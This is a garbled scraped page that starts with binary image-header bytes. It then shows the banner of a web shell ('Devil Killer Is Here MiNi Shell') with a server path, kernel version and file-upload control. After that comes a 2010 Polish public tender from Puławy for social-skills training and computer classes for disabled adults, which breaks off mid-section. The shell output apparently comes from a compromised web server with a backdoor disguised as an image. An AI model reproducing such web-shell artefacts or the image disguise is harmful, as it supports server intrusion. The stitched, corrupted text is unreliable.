JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20100630/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20100630/188572-N-2010.html

<p class="kh_header"><b>Puławy: zorganizowanie i przeprowadzenie szkoleń</b><br>
<b>Numer ogłoszenia: 188572 - 2010; data zamieszczenia: 30.06.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowe Centrum Pomocy Rodzinie , al. Królewska 3, 24-100 Puławy, woj. lubelskie, tel. 81888 04 92, faks 81888 04 92.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pcpr.pulawy.pl; www.efs-pcpr.pulawy.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> zorganizowanie i przeprowadzenie szkoleń.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest organizacja i przeprowadzenie szkoleń dla uczestników Programu aktywności lokalnej - dla osób niepełnosprawnych w wieku 41-64 lat realizowanego przez Powiatowe Centrum Pomocy Rodzinie w Puławach, współfinansowanego ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet VII Promocja Integracji Społecznej, Działanie 7.1 Rozwój i upowszechnianie aktywnej integracji, Poddziałanie 7.1.2. Rozwój i upowszechnianie aktywnej integracji przez powiatowe centra pomocy rodzinie. 
Celem programu jest dostarczenie praktycznych narzędzi umożliwiających osobom niepełnosprawnym pełne uczestnictwo w życiu społecznym, poszerzenie ich kompetencji zawodowych oraz osiągnięcie możliwie największej samodzielności i pełnego wykorzystania zdolności psychofizycznych. 
Cele szczegółowe to: integracja społeczna młodzieży i dorosłych niepełnosprawnych, nabycie umiejętności poszukiwania pracy, kształcenie umiejętności w zakresie pełnienia ról społecznych, wzmocnienie samooceny i poczucia własnej wartości, zdobycie umiejętności radzenia sobie w trudnych sytuacjach, podniesienie zdolności fizycznych..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku udziału w postępowaniu prowadzona będzie w oparciu o złożone przez wykonawcę oświadczenia i dokumenty na zasadzie: spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku udziału w postępowaniu prowadzona będzie w oparciu o złożone przez wykonawcę oświadczenia i dokumenty na zasadzie: spełnia/nie spełnia, przy czym za spełniony niniejszy warunek Zamawiający uzna m.in. wykonanie w okresie 3 lat przed dniem wszczęcia postępowania, a jeżeli okres działalności jest krótszy - w tym okresie co najmniej 2 usług szkoleniowych o tożsamym bądź zbliżonym zakresie tematycznym dla poszczególnych części zamówienia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>tj. dysponują odpowiednim potencjałem technicznym lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego Ocena spełniania warunku udziału w postępowaniu prowadzona będzie w oparciu o złożone przez wykonawcę oświadczenia i dokumenty na zasadzie: spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>tj. dysponują osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia Ocena spełniania warunku udziału w postępowaniu prowadzona będzie w oparciu o złożone przez wykonawcę oświadczenia i dokumenty na zasadzie: spełnia/nie spełnia,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku udziału w postępowaniu prowadzona będzie w oparciu o złożone przez wykonawcę oświadczenia i dokumenty na zasadzie: spełnia/nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>harmonogram wyjazdu w przypadku części I zamówienia oraz program zajęć/szkolenia dla każdego rodzaju zajęć odrębnie, zgodnie z wzorem załączonym do SIWZ</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>a. zmianie terminu zakończenia zamówienia spowodowanej warunkami atmosferycznymi - w przypadku klęski żywiołowej lub gdy warunki atmosferyczne uniemożliwiają wykonanie zamówienia w terminie wynikającym z oferty,
b. zmianie spowodowanej wystąpieniem siły wyższej, czyli zdarzenia którego strony nie mogły przewidzieć i któremu nie mogły zapobiec, ani któremu nie mogą przeciwdziałać, a które uniemożliwią Wykonawcy wykonanie w części lub w całości jego zobowiązań,
c. zmianie warunków płatności na rzecz Wykonawcy na skutek zmian zawartej przez Zamawiającego umowy o dofinansowanie projektu lub wytycznych Instytucji Wdrażającej dotyczących realizacji projektu,
d.zmianie osób upoważnionych do współpracy w sprawach związanych z wykonaniem umowy, o których mowa w § 8 umowy,
e.za zgodą Zamawiającego zmianie osób, przy pomocy których Wykonawca realizować będzie zamówienie, wynikającej z ważnych przyczyn, które nie mogły być wcześniej przewidziane, z zastrzeżeniem, że proponowane przez Wykonawcę osoby będą spełniały warunki określone w SIWZ;  zmiana taka nie wymaga aneksu do umowy;
f.zmianie, w przypadku wystąpienia innych nieprzewidzianych okoliczności mających wpływ na możliwość wykonania umowy( np. żałoba narodowa)</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pcpr.pulawy.pl; www.efs-pcpr.pulawy.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowe Centrum Pomocy Rodzinie
al. Królewska 3
24-100 Puławy.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.07.2010 godzina 08:00, miejsce: Powiatowe Centrum Pomocy Rodzinie
al. Królewska 3
24-100 Puławy.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Programu aktywności lokalnej- dla osób niepełnosprawnych w wieku 41-64 lat realizowanego przez Powiatowe Centrum Pomocy Rodzinie w Puławach, współfinansowanego ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet VII Promocja Integracji Społecznej, Działanie 7.1 Rozwój i upowszechnianie aktywnej integracji, Poddziałanie 7.1.2. Rozwój i upowszechnianie aktywnej integracji przez powiatowe centra pomocy rodzinie.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Trening kompetencji i umiejętności społecznych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest zorganizowanie treningu kompetencji i umiejętności społecznych wraz z terapia psychospołeczną podczas 7- dniowego wyjazdu dla 50  osób - uczestników programu - (tj. 40 osób niepełnosprawnych w wieku 41-64 lat oraz 10 osób - opiekunów osób niepełnosprawnych) łącznie z zakwaterowaniem, ubezpieczeniem od następstw nieszczęśliwych wypadków, wyżywieniem, dowozem z Puław do miejsca zakwaterowania oraz z zapewnieniem powrotu. 
Wśród uczestników programu nie ma osób poruszających się na wózkach inwalidzkich.

2.	Terminy realizacji zamówienia: 

Zamówienie ma być zrealizowane w okresie pomiędzy 7.08.2010r. a 30.09.2010r
i trwać 7 dni łącznie z podróżą.




3.	Miejsce realizacji: 

Zamawiający zastrzega, aby miejscem realizacji zamówienia była jedna z niżej wymienionych lokalizacji:

- miejscowość nadmorska położona pomiędzy gminą Ustronie Morskie ( z uwzględnieniem obszaru gminy) a gminą Krynica Morska ( z uwzględnieniem obszaru gminy) z uwzględnieniem miejscowości położonych na Półwyspie Helskim począwszy od gminy Władysławowo ( z uwzględnieniem obszaru gminy) do miasta Hel ( z uwzględnieniem terenu miasta), z zastrzeżeniem że odległość ośrodka miejsca zakwaterowania uczestników od morza nie może przekraczać 1,5 km, lub
 
- miejscowość na terenie Pojezierza Mazurskiego na obszarze jednej z niżej wymienionych gmin: 
      - Giżycko, Ryn, Kruklanki, Miłki, Wydminy - w powiecie giżyckim,
      -  Budry, Węgorzewo - w powiecie węgorzewskim,
      -  Ełk, Stare Juchy - w powiecie ełckim,
      -  Orzysz, Pisz, Ruciane-Nida -  w powiecie pilskim,
      -  Mikołajki, Mrągowo, Piecki- w powiecie mrągowskim,
z zastrzeżeniem, że odległość ośrodka miejsca zakwaterowania uczestników od jeziora nie może przekraczać 1 km.


4.	Wymagalny minimalny zakres tematyczny: 

W zajęciach biorą udział tylko osoby niepełnosprawne ( tj. 40 osób). W zależności od potrzeb osoby niepełnosprawnej wykonawca ma umożliwić opiekunowi osoby niepełnosprawnej obecność na zajęciach. Wówczas opiekun osoby niepełnosprawnej sprawuje jedynie opiekę. 
Uczestnicy zostaną podzieleni na dwie grupy szkoleniowe, każda po 20 osób.

Trening kompetencji i umiejętności społecznych  ma zawierać w zależności od rodzaju zajęć zagadnienia tematyczne z poniższego zakresu:




a.	
trening kompetencji i umiejętności społecznych:
	
- nabycie większej pewności siebie  i wiary we własne możliwości,
- budowanie poczucia własnej wartości,
- nabycie podstawowych zasad komunikacji interpersonalnej,
- budowanie pozytywnego obrazu siebie oraz motywacji do podejmowania nowych zadań,
- zdobywanie umiejętności samodzielnego podejmowania decyzji oraz skutecznego realizowania zadań

b.	terapia psychospołeczna	-warsztaty z zakresu asertywności, radzenia sobie ze stresem, lękami (techniki relaksacyjne) oraz negatywnymi emocjami,
- radzenie sobie w trudnych sytuacjach społecznych


5.	Sposób prowadzenia szkolenia oraz czas trwania:

Zajęcia  mają być zrealizowane w formie warsztatów grupowych.


Czas trwania poszczególnych zajęć:

a)trening kompetencji i umiejętności społecznych

Czas trwania treningu to 12 godzin zajęć przypadających na każdą z 2 grup szkoleniowych, tj  łącznie 24 godzin zajęć,
 przy czym 1 godzina treningu to 45 minut zajęć.

b)terapia psychospołeczna

Czas trwania terapii to 15 godzin zajęć przypadających na każdą z 2 grup szkoleniowych, tj  łącznie 30 godzin zajęć,
 przy czym 1 godzina terapii to 45 minut zajęć.

 		
		
6.	Wymagane minimalne kwalifikacje kadry, która będzie prowadziła poszczególne zajęcia:

a.	trening kompetencji i umiejętności społecznych
wykształcenie wyższe psychologiczne,

b.	terapia psychospołeczna
wykształcenie wyższe psychologiczne


7.	Inne wymagania:


1. Wykonawca ma zapewnić oraz wliczyć w koszt treningu także: 

a) transport autokarowy uczestników programu z Puław do miejsca zakwaterowania oraz przywóz uczestników do Puław, autokar wyposażony ma być w klimatyzację, 


b) transport w przypadku gdy odległość od miejsca zakwaterowania do miejsca, w którym odbywać się będą zajęcia przekracza 500 m, 


c) suchy prowiant na czas powrotu,


d) pełne wyżywienie (3 posiłki dziennie tj. śniadanie, obiad, kolacja) dla wszystkich  uczestników programu ( tj. dla 50 osób), 


e)  bazę noclegową: 
- zakwaterowanie uczestników programu w domu wczasowym, pensjonacie lub hotelu w jednym budynku lub w dwóch położonych obok siebie, 
-zakwaterowanie uczestników w pokojach 2, 3 - osobowych, tj.:
     19 pokoi 2-osobowych i 4 pokoje 3-osobowe
- wszystkie pokoje mają być z pełnym węzłem sanitarnym ( łazienka i 
toaleta) oraz wyposażone w czajnik elektryczny bezprzewodowy,TV, szklanki oraz po 1 litrze dziennie wody mineralnej na uczestnika,

f)   opłatę klimatyczną, miejscową i inną związaną z pobytem uczestników programu za cały okres pobytu za wszystkich uczestników, jeśli jest wymagana

g)  materiały dydaktyczne/szkoleniowe niezbędne do realizacji zajęć oraz  materiały  biurowe  dla  każdej osoby niepełnosprawnej, w szczególności po 1 notatniku A-4, po 1 długopisie, po 1 sztuce żółtego zakreślacza; materiały dydaktyczne i biurowe po zakończeniu szkolenia stają się własnością osób niepełnosprawnych;
Wszystkie materiały wydane uczestnikom winny być oznaczone logotypem PCPR w Puławach, UE, EFS i PO KL,

h)  serwis kawowy w trakcie trwania zajęć dla każdego uczestnika zajęć w tym również opiekuna osoby niepełnosprawnej, jeśli będzie obecny na zajęciach, tj. kawa, herbata, napoje owocowe, cukier, ciastka, śmietanka do kawy, woda mineralna,

i) ubezpieczenie wszystkich uczestników programu od następstw nieszczęśliwych wypadków na czas wyjazdu ( tj. od wyjazdu z Puław do powrotu do Puław), 

j) 1 opiekuna (koordynatora) wyjazdu na czas całego wyjazdu (łącznie z podróżą), do którego zadań należeć ma m.in. nadzór nad prawidłową realizacją harmonogramu wyjazdu i programu zajęć/szkolenia, nadzór nad zaopatrzeniem uczestników w apteczkę pierwszej pomocy, zapoznanie uczestników z zasadami bezpieczeństwa oraz zapewnienie warunków do ich przestrzegania, nadzór nad prowadzeniem dokumentacji.

k) dostęp do opieki medycznej tzn. zapewnienie przez wykonawcę dowozu uczestnika do przychodni zdrowia - w przypadku wystąpienia potrzeby udzielenia pomocy lekarskiej lub pielęgniarskiej,

l) sale szkoleniowe wyposażone w sprzęt niezbędny do przeprowadzenia danych zajęć, w szczególności w stoły, krzesła, tablicę, ekran projekcyjny; 

ł) wsparcie dodatkowe poprzez zorganizowanie obsługi kulturalno-oświatowej oraz programów i zajęć integracyjnych  tj. co najmniej 1 uroczysta kolacja oraz co najmniej 1 ognisko z pieczeniem kiełbasek lub grillowanie;

2.	Osoby niepełnosprawne uczestniczące w zajęciach otrzymają zaświadczenie o uczestnictwie odrębne dla rodzaju zajęć, o których mowa w rozdz. III lit. F pkt 4 lit.a i b, które mają być oznaczone logotypem PCPR w Puławach, UE, EFS i PO KL,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 7.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zajęcia komputerowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest zorganizowanie szkolenia z podstawowej obsługi komputera i korzystania z internetu dla 40 uczestników programu tj. 

Uczestnicy zostali podzieleni na 2 grupy, każda po 20 osób.


2.	Termin realizacji zamówienia:

w okresie pomiędzy 1.10.2010r. - 31.10.2010r. 

3.	Miejsce realizacji: 

Zamawiający zastrzega, aby miejscem realizacji była sala komputerowa wyposażona w odpowiednią ilość stanowisk komputerowych na terenie miasta Puławy.


4.	Wymagalny minimalny zakres tematyczny: 

Szkolenie ma zawierać zagadnienia z podstawowej obsługi komputera i korzystania z internetu. Zakłada się, że uczestnik szkolenia nabędzie minimum wiedzy z zakresu:

-  zapoznania się ze sprzętem komputerowym,
- podstawową obsługą programu MS Word tj. elementami programu i zasadami pracy w nim obowiązującymi (m.in. tworzenie, zapisywanie i zamykanie dokumentów, kopiowanie i przenoszenie dokumentów),
- założenia konta poczty elektronicznej i jego obsługa,
- wyszukiwania w internecie różnych informacji.


5.	Sposób prowadzenia szkolenia oraz czas trwania:

Szkolenie ma być prowadzone w formie warsztatów grupowych.

Na każdą grupę uczestników przypadać ma po 16 godzin zajęć, przy czym                1 godzina zajęć  to 45 minut. 
Łącznie na 2 grupy uczestników przypadać ma 32 godziny zajęć.

Zajęcia mają odbywać się dwa razy w tygodniu i trwać po 2 godziny. Szkolenie jednej grupy ma odbyć się w okresie 4 tygodni. 
Zajęcia mają odbywać się od poniedziałku do piątku z wyjątkiem dni świątecznych, w godzinach pomiędzy 12:00 a 19:00.

6.	Wymagane minimalne kwalifikacje kadry, która będzie prowadziła zajęcia:

